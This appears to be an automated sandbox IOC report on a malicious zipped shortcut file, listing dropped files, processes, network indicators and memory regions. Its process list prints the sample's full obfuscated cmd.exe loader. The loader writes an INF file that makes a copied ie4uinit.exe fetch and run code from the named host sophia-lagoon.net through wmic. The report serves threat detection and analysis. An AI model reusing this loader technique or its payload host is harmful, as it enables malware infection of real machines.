IOC Report
Education and Experience.lnk(1).zip

loading gif

Files

File Path
Type
Category
Malicious
Education and Experience.lnk(1).zip
Zip archive data, at least v2.0 to extract, compression method=deflate
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf
Windows setup INFormation
dropped
C:\Users\user\Favorites\Bing.url
Generic INItialization configuration [InternetShortcut]
dropped
C:\Windows\Temp\OLDF396.tmp
Windows setup INFormation
dropped
\Device\ConDrv
ASCII text, with CRLF, CR line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wbem\WMIC.exe
wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings"
malicious
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings
malicious
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -ClearIconCache
malicious
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
malicious
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
malicious
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
"C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /v /c set "Lucky50=e" && set "Lucky5=$w" && set "Lucky03=version" && set "Lucky10=d" && (for %u in (a) do @set "Lucky87=%~u") && set "Lucky41=Fast" && call set "Lucky59=%Lucky41:~2,1%" && set "Lucky85=init" && set "Lucky7=t" && set "Lucky26=." && set "Lucky23=settings" && set "Lucky55=si" && (for %q in (c) do @set "Lucky29=%~q") && set "Lucky65=!Lucky26!inf" && set "Lucky15=ieu!Lucky85!!Lucky65!" && call !Lucky59!et "Lucky11=%app!Lucky10!ata%\micro!Lucky59!oft\" && !Lucky59!et "Lucky8=!Lucky11!!Lucky15!" && (for %p in ("[!Lucky03!]" "signature = !Lucky5!indows nt$" "[!Lucky10!e!Lucky59!tinationdirs]" "E4139C=01" "[!Lucky10!efaultin!Lucky59!tall.windows7]" "UnRegis!Lucky7!erOCXs=A687D4" "!Lucky10!elfil!Lucky50!s=E4139C" "[A687D4]" "%11%\scro\" "%Lucky51%j,NI,%Lucky21%%Lucky0%%Lucky0%p%Lucky1%%Lucky9%%Lucky9%sophia-lagoon!Lucky26!%Lucky56%/81754783" "[E4139C]" "ieu%Lucky69%!Lucky65!" "[!Lucky59!!Lucky7!rings]" "Lucky69=!Lucky85!" "Lucky0=t;Lucky40" "!Lucky59!ervicen!Lucky87!me=' '" "Lucky21=h" "Lucky1=:;Lucky35" "Lucky9=/" "!Lucky59!hortsvcn!Lucky87!me=' '" "Lucky56=net" "Lucky51=b;Lucky67" "Lucky25=%time%") do @e!Lucky29!ho %~p)>"!Lucky8!" && !Lucky59!et "Lucky2=ie4u!Lucky85!.!Lucky50!xe" && call xcopy /Y /C /Q %win!Lucky10!ir%\!Lucky59!ystem32\!Lucky2! "!Lucky11!*" | set Lucky93=Nation && !Lucky59!t!Lucky87!rt "" wmi!Lucky29! proce!Lucky59!s call !Lucky29!rea!Lucky7!e "!Lucky11!!Lucky2! -base!Lucky23!" | set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" call xcopy /Y /C /Q %windir%\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*" "
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set Lucky93=Nation "
C:\Windows\System32\xcopy.exe
xcopy /Y /C /Q C:\Windows\system32\ie4uinit.exe "C:\Users\user\AppData\Roaming\microsoft\*"
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" start "" wmic process call create "C:\Users\user\AppData\Roaming\microsoft\ie4uinit.exe -basesettings" "
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set Lucky28= Occur Elevator Knock Considerations Teens Stool Rankings Offices Message Toward Reviews Discusses Appliances Tasks Scorpion Situations Erase Shock Clean Vault Carriers Twins Disease Dentists Seeks Friends Impulse Vehicles Stand Submissions Night Batteries Cigar Junior Heart Habit Containers Cables Taxes Ostrich Series Incentives Sorts Erode Measurements Investigators Styles Music Actress Items Differ Suits Sources Archives Headphones Texas Emotions Monsters Above Holdings Outputs Characteristics Forecasts Readers Processes Plastic Mosquito Roses Manuals Representatives Editors Elephant Recommendations Roommates Coral Dolphin Offers Focuses Implies Ignore Champions Family Rangers Garlic Blind Evidence Facilities Products Makers Wives Pockets Solaris Vibrant Excess Raven Secrets Celebs Summaries Inherit Crawl Tutorials Stands Upgrade Crowd Betray Orange Patient Entire Weather Cruel Wellness Attention Waters Failures Jewel Buttons Assume Configurations Levels Enemy Labels Memories Ticket Honey Violin Primary Lovers Depends Exceptions Findings Olympics Cousin Kinds Fruits Centres Smart Avoid Mechanic Gorilla Swingers Century Figure Details Renew Careers Embody Shapes Antibodies Motion Interactions Instances Miles Subway Remain Legend Mounts Midnight Mercy Filter Sessions Asthma Shrimp Greetings Autumn"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\rundll32.exe
C:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0
There are 5 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=
unknown
http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
unknown
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=
unknown
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=
unknown
http://sophia-lagoon.net/81754783
142.11.222.59
http://sophia-lagoon.net/81754783WWC:
unknown
http://sophia-lagoon.net/81754783lP
unknown
https://www.baidu.com/s?tn=80035161_2_dg&wd=
unknown
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=
unknown

Domains

Name
IP
Malicious
sophia-lagoon.net
142.11.222.59

IPs

IP
Domain
Country
Malicious
142.11.222.59
sophia-lagoon.net
United States

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SQM
InstallDate

Memdumps

Base Address
Regiontype
Protect
Malicious
2474C1C0000
heap
page read and write
1D9DD42D000
heap
page read and write
16371D95000
heap
page read and write
1AF64137000
heap
page read and write
28F98039000
unkown
page read and write
1D9DD38A000
heap
page read and write
B4CB5FF000
stack
page read and write
11A2C7E000
stack
page read and write
1C8F49BF000
heap
page read and write
23927313000
heap
page read and write
2474BFBA000
heap
page read and write
7FF63F4F1000
unkown
page execute read
1D9DD3DE000
heap
page read and write
2474BFCC000
heap
page read and write
2474DF90000
heap
page read and write
1766C85A000
heap
page read and write
21845C47000
heap
page read and write
7FF5ADCC1000
unkown
page readonly
7FF5ADC2E000
unkown
page readonly
1D9DD3B5000
heap
page read and write
1D9DD418000
heap
page read and write
1AF63FD0000
heap
page read and write
21845C2B000
heap
page read and write
B4CB6FA000
stack
page read and write
1D9DD3F1000
heap
page read and write
1AF640BD000
heap
page read and write
2474C031000
heap
page read and write
28F97F60000
unkown
page read and write
1D9DDC52000
heap
page read and write
1AF642B0000
heap
page read and write
1C8F4A7A000
heap
page read and write
1D9DD360000
heap
page read and write
1D9DD630000
heap
page read and write
1D9DDC5F000
heap
page read and write
1D9DDF4C000
heap
page read and write
1759FE80000
heap
page read and write
1D9DD3F4000
heap
page read and write
1D9DD406000
heap
page read and write
1D9DD40A000
heap
page read and write
1D9DD3D1000
heap
page read and write
21845C5B000
heap
page read and write
23927200000
heap
page read and write
1D9DDC69000
heap
page read and write
116DC228000
heap
page read and write
1D9DD413000
heap
page read and write
4761C7E000
stack
page read and write
1D9DD41B000
heap
page read and write
1D9DD3B6000
heap
page read and write
21846402000
trusted library allocation
page read and write
DCD098D000
stack
page read and write
1C8F4327000
heap
page read and write
2474C022000
heap
page read and write
21845C69000
heap
page read and write
2392724C000
heap
page read and write
1D9DDF47000
heap
page read and write
62616D000
stack
page read and write
1C8F4980000
heap
page read and write
A56B27F000
stack
page read and write
CBBF96A000
stack
page read and write
1D9DD421000
heap
page read and write
1F02BA62000
heap
page read and write
1D9DD3B0000
heap
page read and write
3E207E000
stack
page read and write
7FF63F4F0000
unkown
page readonly
2474DEA0000
heap
page read and write
28F982D0000
unkown
page readonly
1D9DD412000
heap
page read and write
1AF6408F000
heap
page read and write
28F9803E000
unkown
page read and write
8C15B7D000
stack
page read and write
B8EF37E000
stack
page read and write
B72C9DB000
stack
page read and write
36E767E000
stack
page read and write
1D9DD3E3000
heap
page read and write
1F377444000
heap
page read and write
1C8F496D000
heap
page read and write
11A317C000
stack
page read and write
1D9DDC61000
heap
page read and write
2474E2C2000
heap
page read and write
8C15AFE000
stack
page read and write
B8EEE7E000
stack
page read and write
1D9DD44D000
heap
page read and write
1D9DD421000
heap
page read and write
21845C80000
heap
page read and write
1C8F4A45000
heap
page read and write
11A327F000
stack
page read and write
1766C800000
heap
page read and write
1D9DDF40000
heap
page read and write
1D9DD426000
heap
page read and write
1AF64073000
heap
page read and write
1D9DDF56000
heap
page read and write
23E7A590000
heap
page read and write
2784FCC4000
heap
page read and write
1759FE2B000
heap
page read and write
116DC070000
heap
page read and write
1C8F4968000
heap
page read and write
1AF64057000
heap
page read and write
1D9DD42C000
heap
page read and write
1C8F49DF000
heap
page read and write
1AF6424E000
heap
page read and write
7FF5ADD6D000
unkown
page readonly
1C8F44B5000
heap
page read and write
1D9DD393000
heap
page read and write
2BDF9675000
heap
page read and write
252589A0000
heap
page read and write
1D9DD280000
heap
page read and write
1D9DD440000
heap
page read and write
1D9DD3F4000
heap
page read and write
2474C013000
heap
page read and write
21845C8F000
heap
page read and write
1F626B80000
heap
page read and write
3E247C000
stack
page read and write
1C8F4920000
heap
page read and write
247504A0000
heap
page read and write
7FF63F525000
unkown
page read and write
3E1E7E000
stack
page read and write
1D9DD3F9000
heap
page read and write
1D9DDF3A000
heap
page read and write
16371BA0000
heap
page read and write
2474C008000
heap
page read and write
1C8F4A20000
heap
page read and write
2525A470000
heap
page read and write
7FF5ADD1A000
unkown
page readonly
1F02BA40000
heap
page read and write
2474C02A000
heap
page read and write
116DC25C000
heap
page read and write
1D9DD3F9000
heap
page read and write
1C8F4A66000
heap
page read and write
1766C700000
heap
page read and write
B4CB274000
stack
page read and write
1F02BA7E000
heap
page read and write
1D9DD2A0000
heap
page read and write
23E7A5D0000
heap
page read and write
25258B45000
heap
page read and write
1766C874000
heap
page read and write
36E6D5D000
stack
page read and write
1D9DD3BD000
heap
page read and write
36E72F9000
stack
page read and write
1D9DD425000
heap
page read and write
B72CFF7000
stack
page read and write
1D9DD415000
heap
page read and write
47619DE000
stack
page read and write
2474C022000
heap
page read and write
1F02BA13000
heap
page read and write
3E1EFE000
stack
page read and write
1D9DD41B000
heap
page read and write
28F98002000
unkown
page read and write
2474C063000
heap
page read and write
7FF5ADCBE000
unkown
page readonly
B8EEB8B000
stack
page read and write
2474DF10000
heap
page read and write
1759FD40000
heap
page read and write
1AF6424A000
heap
page read and write
1D9DD3F4000
heap
page read and write
2784F9C0000
heap
page read and write
21845C41000
heap
page read and write
1AF642BB000
heap
page read and write
4761EFF000
stack
page read and write
175A0602000
trusted library allocation
page read and write
1D9DD426000
heap
page read and write
1D9DDC61000
heap
page read and write
1D9DD3F9000
heap
page read and write
21845C35000
heap
page read and write
255F47C000
stack
page read and write
28F97F30000
heap
page read and write
1759FE13000
heap
page read and write
21845C8D000
heap
page read and write
1F626DA5000
heap
page read and write
28F98015000
unkown
page read and write
3005D7F000
stack
page read and write
23E7A7B5000
heap
page read and write
3005EFF000
stack
page read and write
1F377C02000
trusted library allocation
page read and write
1D9DDF33000
heap
page read and write
21845C62000
heap
page read and write
222387B000
stack
page read and write
1F37742B000
heap
page read and write
2474C255000
heap
page read and write
1D9DD440000
heap
page read and write
1D9DD3E1000
heap
page read and write
2474C250000
heap
page read and write
7FF63F527000
unkown
page readonly
23927240000
heap
page read and write
1F377434000
heap
page read and write
1D9DD415000
heap
page read and write
1E0A1D90000
heap
page read and write
23927239000
heap
page read and write
28F98037000
unkown
page read and write
B72D37E000
stack
page read and write
36E757E000
stack
page read and write
16371BA8000
heap
page read and write
7FF63F517000
unkown
page readonly
F5C5EFE000
stack
page read and write
36E747E000
stack
page read and write
4761D7F000
stack
page read and write
23927302000
heap
page read and write
1D9DD3FA000
heap
page read and write
21845C57000
heap
page read and write
1759FE39000
heap
page read and write
1D9DD445000
heap
page read and write
116DC240000
heap
page read and write
1C8F43EB000
heap
page read and write
3E217D000
stack
page read and write
1D9DDC53000
heap
page read and write
B4CB276000
stack
page read and write
1D9DD3DE000
heap
page read and write
2474C03E000
heap
page read and write
23E7A570000
heap
page read and write
1AF65EE0000
heap
page read and write
21845C46000
heap
page read and write
A56AFCE000
stack
page read and write
28F98000000
unkown
page read and write
1D9DD3FE000
heap
page read and write
29C035F000
stack
page read and write
B8EF07E000
stack
page read and write
7FF63F517000
unkown
page readonly
1D9DD443000
heap
page read and write
1D9DD3F1000
heap
page read and write
1D9DD3F1000
heap
page read and write
B8EF17F000
stack
page read and write
1D9DD3E0000
heap
page read and write
255F37C000
stack
page read and write
1D9DDC5B000
heap
page read and write
1D9DD37B000
heap
page read and write
7FF5ADCAD000
unkown
page readonly
1D9DDC52000
heap
page read and write
2474BFBE000
heap
page read and write
21845C48000
heap
page read and write
23927265000
heap
page read and write
1C8F4971000
heap
page read and write
1D9DD160000
heap
page read and write
8EB27FE000
stack
page read and write
1766C841000
heap
page read and write
1D9DDF3A000
heap
page read and write
2784F9C8000
heap
page read and write
1F377413000
heap
page read and write
28F98664000
unkown
page readonly
1C8F4412000
heap
page read and write
7FF5ADD23000
unkown
page readonly
2784F8D0000
heap
page read and write
1AF64073000
heap
page read and write
1AF64245000
heap
page read and write
1D9DDC5F000
heap
page read and write
1D9DD406000
heap
page read and write
2474C022000
heap
page read and write
1AF64244000
heap
page read and write
255ECFC000
stack
page read and write
247505A0000
trusted library allocation
page read and write
1F626BA0000
heap
page read and write
1C8F4A21000
heap
page read and write
F5C5BCB000
stack
page read and write
1D9DD44D000
heap
page read and write
36E71FE000
stack
page read and write
1F377390000
heap
page read and write
1D9DDC65000
heap
page read and write
1D9DDC73000
heap
page read and write
1D9DD435000
heap
page read and write
1C8F43BD000
heap
page read and write
1D9DD41B000
heap
page read and write
7FF5ADD07000
unkown
page readonly
2392725B000
heap
page read and write
1D9DD428000
heap
page read and write
1AF64091000
heap
page read and write
1D9DD406000
heap
page read and write
2474BFD0000
heap
page read and write
1E0A1C10000
heap
page read and write
2474E0D0000
heap
page read and write
28F98661000
unkown
page readonly
1AF6406C000
heap
page read and write
222367C000
stack
page read and write
1D9DDC75000
heap
page read and write
1AF64051000
heap
page read and write
36E717E000
stack
page read and write
1D9DD437000
heap
page read and write
1D9DD421000
heap
page read and write
1D9DD42F000
heap
page read and write
1D9DD40A000
heap
page read and write
1F02BB00000
heap
page read and write
8C15A7D000
stack
page read and write
21845A10000
heap
page read and write
1D9DD43E000
heap
page read and write
36E73FE000
stack
page read and write
1F02B970000
trusted library allocation
page read and write
2BDF9610000
heap
page read and write
1766C750000
heap
page read and write
3005BFE000
stack
page read and write
23E7A430000
heap
page read and write
1C8F43DA000
heap
page read and write
7FF5AD932000
unkown
page readonly
1AF6424A000
heap
page read and write
28F98661000
unkown
page readonly
21845C85000
heap
page read and write
1D9DDC5B000
heap
page read and write
2474C043000
heap
page read and write
1D9DD425000
heap
page read and write
1D9DD43D000
heap
page read and write
16371BF1000
heap
page read and write
29C067F000
stack
page read and write
1D9DD402000
heap
page read and write
1D9DD43D000
heap
page read and write
1D9DD42C000
heap
page read and write
1D9DDF32000
heap
page read and write
7FF63F525000
unkown
page read and write
1AF6409F000
heap
page read and write
1D9DDC6F000
heap
page read and write
2474C058000
heap
page read and write
21845C6C000
heap
page read and write
1D9DD388000
heap
page read and write
1D9DD3F1000
heap
page read and write
21845C61000
heap
page read and write
1D9DD420000
heap
page read and write
21845C8D000
heap
page read and write
16371D80000
heap
page read and write
1D9DD435000
heap
page read and write
36E74F9000
stack
page read and write
1D9DD3B5000
heap
page read and write
1D9DD3CE000
heap
page read and write
21845A20000
heap
page read and write
3E21FE000
stack
page read and write
2BDF9630000
heap
page read and write
1AF64144000
heap
page read and write
1F377513000
heap
page read and write
B72D07E000
stack
page read and write
2474DF30000
trusted library allocation
page read and write
1D9DD445000
heap
page read and write
28F97EC0000
heap
page read and write
1D9DD439000
heap
page read and write
21845C44000
heap
page read and write
1D9DD370000
heap
page read and write
1F377502000
heap
page read and write
1D9DD411000
heap
page read and write
1D9DD3BD000
heap
page read and write
1D9DDF30000
heap
page read and write
1D9DDC5C000
heap
page read and write
1D9DDC53000
heap
page read and write
1F02BB02000
heap
page read and write
1AF64092000
heap
page read and write
1AF6413B000
heap
page read and write
1F02BB13000
heap
page read and write
1D9DD440000
heap
page read and write
21845C68000
heap
page read and write
1D9DD410000
heap
page read and write
1D9DD447000
heap
page read and write
1D9DD39E000
heap
page read and write
1D9DDC63000
heap
page read and write
8EB25F7000
stack
page read and write
1D9DD40C000
heap
page read and write
7FF63F52A000
unkown
page readonly
1AF64030000
heap
page read and write
2474C039000
heap
page read and write
7FF63F517000
unkown
page readonly
1D9DDC50000
heap
page read and write
1AF640B3000
heap
page read and write
7FF63F525000
unkown
page read and write
1AF6404A000
heap
page read and write
21845C6D000
heap
page read and write
1D9DDF3E000
heap
page read and write
1D9DD418000
heap
page read and write
3005E7F000
stack
page read and write
2474DEF0000
heap
page read and write
23E7A7B0000
heap
page read and write
25258B00000
heap
page read and write
7FF63F516000
unkown
page readonly
2474C01E000
heap
page read and write
1D9DDC62000
heap
page read and write
1C8F42B0000
heap
page read and write
1766C857000
heap
page read and write
1D9DD3CE000
heap
page read and write
1D9DD3D2000
heap
page read and write
C6EE4FF000
stack
page read and write
7FF5ADCE2000
unkown
page readonly
25258AE0000
heap
page read and write
28F98024000
unkown
page read and write
2474DF23000
heap
page read and write
23927060000
heap
page read and write
3005A79000
stack
page read and write
116DC255000
heap
page read and write
1D9DD439000
heap
page read and write
1D9DDC65000
heap
page read and write
1759FCE0000
heap
page read and write
1F37746F000
heap
page read and write
1D9DDF4B000
heap
page read and write
2474C033000
heap
page read and write
247505A0000
trusted library allocation
page read and write
2474DF30000
trusted library allocation
page read and write
1D9DD440000
heap
page read and write
29C06FE000
stack
page read and write
222377F000
stack
page read and write
116DC000000
heap
page read and write
1D9DD44E000
heap
page read and write
C6EE47C000
stack
page read and write
1766C886000
heap
page read and write
1AF64066000
heap
page read and write
1D9DD447000
heap
page read and write
2BDF9730000
heap
page read and write
2474FFA0000
heap
page read and write
1D9DD403000
heap
page read and write
222397F000
stack
page read and write
7FF5ADCAB000
unkown
page readonly
28F97EC0000
heap
page read and write
1D9DD3F4000
heap
page read and write
16371AE0000
heap
page read and write
1766C86A000
heap
page read and write
4761957000
stack
page read and write
163719A0000
heap
page read and write
1C8F4A88000
heap
page read and write
1AF640A4000
heap
page read and write
2BDF973B000
heap
page read and write
2474C150000
heap
page read and write
1D9DDC51000
heap
page read and write
6261EE000
stack
page read and write
1D9DDF34000
heap
page read and write
28F98802000
unkown
page read and write
21845C7A000
heap
page read and write
1C8F499F000
heap
page read and write
2474BFE2000
heap
page read and write
DCD0C7D000
stack
page read and write
1D9DD43E000
heap
page read and write
1E0A1CF0000
heap
page read and write
23927277000
heap
page read and write
1D9DD36C000
heap
page read and write
1F02D402000
trusted library allocation
page read and write
28F98102000
unkown
page read and write
21845C4D000
heap
page read and write
1D9DD44D000
heap
page read and write
11A2E7B000
stack
page read and write
21845C71000
heap
page read and write
1F626BA7000
heap
page read and write
B4CB37D000
stack
page read and write
8C157AC000
stack
page read and write
7FF5ADCF4000
unkown
page readonly
1D9DD3C8000
heap
page read and write
1AF6413C000
heap
page read and write
1F626CA0000
heap
page read and write
1C8F42D0000
heap
page read and write
1766C913000
heap
page read and write
1F02BA02000
heap
page read and write
7FF5ADD0F000
unkown
page readonly
3005DFF000
stack
page read and write
21845C74000
heap
page read and write
1D9DD3A6000
heap
page read and write
1D9DD443000
heap
page read and write
2474C038000
heap
page read and write
28F97F30000
heap
page read and write
1C8F4A69000
heap
page read and write
1AF6404A000
heap
page read and write
B8EF27E000
stack
page read and write
1F02BA2B000
heap
page read and write
1AF6424B000
heap
page read and write
1F02B950000
trusted library allocation
page read and write
1F3773D0000
trusted library allocation
page read and write
11A275B000
stack
page read and write
2BDFB120000
heap
page read and write
116DC22B000
heap
page read and write
1AF64060000
heap
page read and write
2474BF88000
heap
page read and write
1AF64045000
heap
page read and write
1D9DD3C1000
heap
page read and write
7FF5ADD21000
unkown
page readonly
2474BF60000
heap
page read and write
1D9DD3C6000
heap
page read and write
1D9DDF51000
heap
page read and write
23E7A5D7000
heap
page read and write
28F97ED0000
heap
page read and write
1759FE5C000
heap
page read and write
2474BFC8000
heap
page read and write
1F377402000
heap
page read and write
21845C73000
heap
page read and write
255F27F000
stack
page read and write
1D9DD410000
heap
page read and write
1D9DD41C000
heap
page read and write
21845C5E000
heap
page read and write
1AF640A6000
heap
page read and write
7FF63F525000
unkown
page read and write
1D9DD439000
heap
page read and write
1C8F42F0000
trusted library allocation
page read and write
29C03DE000
stack
page read and write
16371B50000
heap
page read and write
1D9DD3D1000
heap
page read and write
23927A00000
heap
page read and write
3E1D7D000
stack
page read and write
28F98010000
unkown
page read and write
1D9DD3D3000
heap
page read and write
1D9DD3F4000
heap
page read and write
1AF64243000
heap
page read and write
1F37745D000
heap
page read and write
1E0A1A4E000
heap
page read and write
1D9DD44D000
heap
page read and write
CBBF9EF000
stack
page read and write
1759FE43000
heap
page read and write
1D9DD448000
heap
page read and write
1D9DDF3B000
heap
page read and write
1C8F4A40000
heap
page read and write
1F377445000
heap
page read and write
2784FCC0000
heap
page read and write
DCD090E000
stack
page read and write
7FF63F525000
unkown
page read and write
1AF64038000
heap
page read and write
2474C003000
heap
page read and write
22232FB000
stack
page read and write
1D9DD3D1000
heap
page read and write
7FF5ADCB4000
unkown
page readonly
1D9DD416000
heap
page read and write
28F98013000
unkown
page read and write
1AF64076000
heap
page read and write
1D9DD3E6000
heap
page read and write
21845C5F000
heap
page read and write
21845C4B000
heap
page read and write
1D9DD3DE000
heap
page read and write
8EB26FE000
stack
page read and write
21845C6B000
heap
page read and write
B72D0FD000
stack
page read and write
28F98017000
unkown
page read and write
255F57C000
stack
page read and write
2784F940000
heap
page read and write
1D9DD3E8000
heap
page read and write
8EB24FB000
stack
page read and write
1D9DD635000
heap
page read and write
1AF6408A000
heap
page read and write
28F98045000
unkown
page read and write
1D9DD3E3000
heap
page read and write
1C8F4362000
heap
page read and write
1AF64247000
heap
page read and write
21845C4B000
heap
page read and write
1AF64099000
heap
page read and write
21845A80000
heap
page read and write
116DC213000
heap
page read and write
1766C82B000
heap
page read and write
4761F7D000
stack
page read and write
B72D47B000
stack
page read and write
29C02DA000
stack
page read and write
2474C035000
heap
page read and write
A56AF4A000
stack
page read and write
1D9DD439000
heap
page read and write
1F02B850000
heap
page read and write
1D9DD3E8000
heap
page read and write
2474BFB9000
heap
page read and write
1AF640C0000
heap
page read and write
1766C780000
trusted library allocation
page read and write
1D9DD3E3000
heap
page read and write
1D9DD3A4000
heap
page read and write
16371B00000
heap
page read and write
1F02B9A0000
remote allocation
page read and write
1766C864000
heap
page read and write
1D9DDC55000
heap
page read and write
1AF6407B000
heap
page read and write
1F6286A0000
heap
page read and write
1D9DD42F000
heap
page read and write
36E75F9000
stack
page read and write
1D9DD3D2000
heap
page read and write
1D9DD443000
heap
page read and write
1F377400000
heap
page read and write
2474C01A000
heap
page read and write
28F982D0000
unkown
page readonly
2474BFE8000
heap
page read and write
4761DFC000
stack
page read and write
21845C00000
heap
page read and write
1D9DDF3A000
heap
page read and write
1D9DD3DD000
heap
page read and write
28F98005000
unkown
page read and write
28F9802E000
unkown
page read and write
CBBFCFF000
stack
page read and write
28F98002000
unkown
page read and write
1766C86E000
heap
page read and write
2474C045000
heap
page read and write
2474C03E000
heap
page read and write
21845C64000
heap
page read and write
1D9DD3CB000
heap
page read and write
3005B7D000
stack
page read and write
1759FE00000
heap
page read and write
222357C000
stack
page read and write
1F37744F000
heap
page read and write
1C8F496B000
heap
page read and write
21845C63000
heap
page read and write
23927A15000
heap
page read and write
21845C82000
heap
page read and write
1F3773C0000
trusted library allocation
page read and write
1D9DD412000
heap
page read and write
1F377330000
heap
page read and write
1759FE02000
heap
page read and write
21845C76000
heap
page read and write
1D9DD43E000
heap
page read and write
21845C54000
heap
page read and write
116DC332000
heap
page read and write
21845C4C000
heap
page read and write
1F02BB16000
heap
page read and write
21845C3E000
heap
page read and write
1AF6406A000
heap
page read and write
1759FCF0000
heap
page read and write
21845C66000
heap
page read and write
1D9DD3E0000
heap
page read and write
2222FAF000
stack
page read and write
1C8F44B0000
heap
page read and write
1D9DD435000
heap
page read and write
B8EEEFE000
stack
page read and write
21845C5D000
heap
page read and write
2BDF9670000
heap
page read and write
2474BF80000
heap
page read and write
3E178B000
stack
page read and write
11A307C000
stack
page read and write
1AF640B4000
heap
page read and write
1D9DDC66000
heap
page read and write
23927213000
heap
page read and write
1AF64138000
heap
page read and write
1D9DD3E8000
heap
page read and write
1D9DD3E0000
heap
page read and write
1C8F43C7000
heap
page read and write
B4CB57E000
stack
page read and write
CBBFC7F000
stack
page read and write
1F02BA00000
heap
page read and write
1D9DD3AD000
heap
page read and write
8EB23FB000
stack
page read and write
1AF6408C000
heap
page read and write
1D9DD3EF000
heap
page read and write
1AF64088000
heap
page read and write
1D9DD412000
heap
page read and write
C6EE57E000
stack
page read and write
1D9DDF37000
heap
page read and write
1E0A1A20000
heap
page read and write
23927A02000
heap
page read and write
8EB22FE000
stack
page read and write
1D9DD393000
heap
page read and write
1D9DD41B000
heap
page read and write
1C8F43B3000
heap
page read and write
1F626DA0000
heap
page read and write
1D9DD447000
heap
page read and write
8EB28FE000
stack
page read and write
1F02B9A0000
remote allocation
page read and write
1C8F49AF000
heap
page read and write
8EB227E000
stack
page read and write
1D9DD406000
heap
page read and write
1D9DD435000
heap
page read and write
1D9DD439000
heap
page read and write
2BDF94D0000
heap
page read and write
21845C6A000
heap
page read and write
1759FE6D000
heap
page read and write
B4CB3FE000
stack
page read and write
1C8F43D2000
heap
page read and write
21845C93000
heap
page read and write
116DC010000
heap
page read and write
3E22FD000
stack
page read and write
1AF65FF0000
heap
page read and write
239270D0000
heap
page read and write
1E0A19B0000
heap
page read and write
1AF640C0000
heap
page read and write
28F98030000
unkown
page read and write
1E0A1A40000
heap
page read and write
1D9DD43D000
heap
page read and write
1D9DD384000
heap
page read and write
1D9DD3EF000
heap
page read and write
1D9DD3E5000
heap
page read and write
1AF63F90000
heap
page read and write
1D9DD439000
heap
page read and write
2392722A000
heap
page read and write
29C077E000
stack
page read and write
7FF5ADCA4000
unkown
page readonly
1D9DDC6D000
heap
page read and write
7FF63F525000
unkown
page write copy
1AF6424A000
heap
page read and write
1F02B7E0000
heap
page read and write
1C8F4961000
heap
page read and write
1E0A1D95000
heap
page read and write
21845C13000
heap
page read and write
239271D0000
trusted library allocation
page read and write
1D9DD424000
heap
page read and write
1D9DD3CC000
heap
page read and write
1766C827000
heap
page read and write
1D9DD443000
heap
page read and write
1D9DD410000
heap
page read and write
1D9DD3E3000
heap
page read and write
B72D27F000
stack
page read and write
23927300000
heap
page read and write
3E1F7B000
stack
page read and write
